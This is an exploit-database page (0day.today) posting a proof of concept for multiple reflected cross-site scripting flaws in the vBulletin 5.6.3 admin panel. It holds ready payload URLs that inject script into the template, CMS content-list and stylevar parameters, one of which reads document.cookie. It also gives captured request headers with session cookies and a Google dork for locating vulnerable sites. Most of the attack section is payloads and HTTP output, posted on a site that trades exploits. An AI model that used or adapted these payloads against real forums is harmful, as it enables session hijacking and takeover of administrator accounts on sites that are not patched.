0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
vBulletin 5.6.3 Multiple Cross-Site Scripting Vulnerabilities
# Exploit Title: vBulletin 5.6.3 Multiple cross-site scripting vulnerabilities # Author: Vincent666 ibn Winnie # Software Link: https://www.vbulletin.com/en/features/ # Tested on: Windows 10 # Web Browser: Mozilla Firefox & Opera # Blog : https://pentest-vincent.blogspot.com/ # PoC: https://pentest-vincent.blogspot.com/2020/09/vbulletin-563-cross-site-scripting.html # Google Dorks: "Powered by vBulletin® Version 5.6.3" 1. Go to the "Admin CP" - click on "Styles" - click "Style Manager" - Choose "Denim" or other theme and choose action "Add new template" and click "Go". Put on the title "1" and template "1" and "Save and Reload". Now you can catch the new URL with HTTP Live Headers or with hands. So..we have Url : https://469caffdf16a-041586.demo.vbulletin.net/admincp/template.php?templateid=608&group=&expandset=&searchset=&searchstring=&do=edit&windowScrollTop=168&textareaScrollTop=0 Test it with hands and get cross site scripting. Use for tests different browsers. I use Mozilla Firefox and Opera. https://469caffdf16a-041586.demo.vbulletin.net/admincp/template.php?templateid=1&group=""><script>alert("Cross Site Scripting")</script><script>alert(document.cookie)</script>&expandset=&searchset=&searchstring=&do=edit&windowScrollTop= Picture: https://imgur.com/a/b6gH5Fn Video: https://www.youtube.com/watch?v=J7M-miwj-ps https://469caffdf16a-041586.demo.vbulletin.net/core/clientscript/codemirror/lib/codemirror.js?v=563 Host: 469caffdf16a-041586.demo.vbulletin.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://469caffdf16a-041586.demo.vbulletin.net/admincp/template.php?templateid=1&group=%22%22%3E%3Cscript%3Ealert(%22Cross%20Site%20Scripting%22)%3C/script%3E&expandset=&searchset=&searchstring=&do=edit&windowScrollTop= Cookie: vb41586sessionhash=59aae5dd50001c516d71c59cd2043238; vb41586lastvisit=1599290306; vb41586lastactivity=1599294784; PHPSESSID=8a36de42d82550c3b703ff2dfbd2b99ec786b55243861e3b; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41586np_notices_displayed=; vb41586cpsession=d16b326f99bd426c0fdd5c6966033ff0; vb41586sitebuilder_active=1; vb41586userstyleid=15 GET: HTTP/1.1 200 OK Date: Sat, 05 Sep 2020 07:58:41 GMT Last-Modified: Wed, 26 Aug 2020 18:26:32 GMT ETag: "47ae7-5adcbf57b0600-gzip" Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Cache-Control: max-age=1209600, private Expires: Sat, 19 Sep 2020 07:58:41 GMT Content-Type: application/javascript --------------------- https://469caffdf16a-041586.demo.vbulletin.net/core/clientscript/vbulletin_templatemgr.js?v=563 Host: 469caffdf16a-041586.demo.vbulletin.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://469caffdf16a-041586.demo.vbulletin.net/admincp/template.php?templateid=1&group=%22%22%3E%3Cscript%3Ealert(%22Cross%20Site%20Scripting%22)%3C/script%3E&expandset=&searchset=&searchstring=&do=edit&windowScrollTop= Cookie: vb41586sessionhash=59aae5dd50001c516d71c59cd2043238; vb41586lastvisit=1599290306; vb41586lastactivity=1599294784; PHPSESSID=8a36de42d82550c3b703ff2dfbd2b99ec786b55243861e3b; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41586np_notices_displayed=; vb41586cpsession=d16b326f99bd426c0fdd5c6966033ff0; vb41586sitebuilder_active=1; vb41586userstyleid=15 GET: HTTP/1.1 200 OK Date: Sat, 05 Sep 2020 07:25:40 GMT Last-Modified: Wed, 26 Aug 2020 18:26:32 GMT ETag: "221b-5adcbf57b0600-gzip" Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Cache-Control: max-age=1209600, private Expires: Sat, 19 Sep 2020 07:25:40 GMT Content-Length: 4076 Content-Type: application/javascript --------------------- 2. Admin CP – Articles-Content List – open link in new windows (search word “First” and click) https://469caffdf16a-041586.demo.vbulletin.net/admincp/cms.php?do=contentlist&page=1&perpage=25&tag=default https://469caffdf16a-041586.demo.vbulletin.net/admincp/cms.php?do=contentlist&page=1&perpage=25&tag=[our XSS is here] https://469caffdf16a-041586.demo.vbulletin.net/admincp/cms.php?do=contentlist&page=1&perpage=25&tag=""><script>alert("xss")</script> Picture: https://imgur.com/a/xL2F5rA Video: https://www.youtube.com/watch?v=wc2U_qF80Nw&feature=youtu.be 3. https://469caffdf16a-041586.demo.vbulletin.net/admincp/stylevar.php https://469caffdf16a-041586.demo.vbulletin.net/admincp/stylevar.php?do=confirmrevert&dostyleid=15&stylevarid=[cross site scripting is here..] https://469caffdf16a-041586.demo.vbulletin.net/admincp/stylevar.php?do=confirmrevert&dostyleid=15&stylevarid=%22%22%22%3E%3Cscript%3Ealert(%22vBulletin%205.6.3%20Multiple%20Cross%20Site%20Scripting%22)%3C/script%3E Picture: https://imgur.com/a/O0JhHhH Video: https://youtu.be/mUqsFgZy_7Y https://469caffdf16a-041586.demo.vbulletin.net/core/clientscript/vbulletin_stylevars.js?v=563 Host: 469caffdf16a-041586.demo.vbulletin.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://469caffdf16a-041586.demo.vbulletin.net/admincp/stylevar.php?do=confirmrevert&dostyleid=15&stylevarid=%22%22%22%3E%3Cscript%3Ealert(%22vBulletin%205.6.3%20Multiple%20Cross%20Site%20Scripting%22)%3C/script%3E Cookie: vb41586sessionhash=d06600305ecde6184594af48383373ff; vb41586lastvisit=1599343406; vb41586lastactivity=1599344851; BIGipServervbdemo-web_POOL=1459677194.20480.0000; vb41586cpsession=250b09cd03c73a864836b2fd5cf6392b; PHPSESSID=84aa5ac7477d3368250b4af4be8d779d04852b856d185b8c; vb41586np_notices_displayed= GET: HTTP/1.1 200 OK Date: Sat, 05 Sep 2020 22:03:30 GMT Last-Modified: Wed, 26 Aug 2020 18:26:32 GMT ETag: "127b-5adcbf57b0600-gzip" Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Cache-Control: max-age=1209600, private Expires: Sat, 19 Sep 2020 22:03:30 GMT Content-Length: 1385 Content-Type: application/javascript --------------------- # 0day.today [2024-07-02] #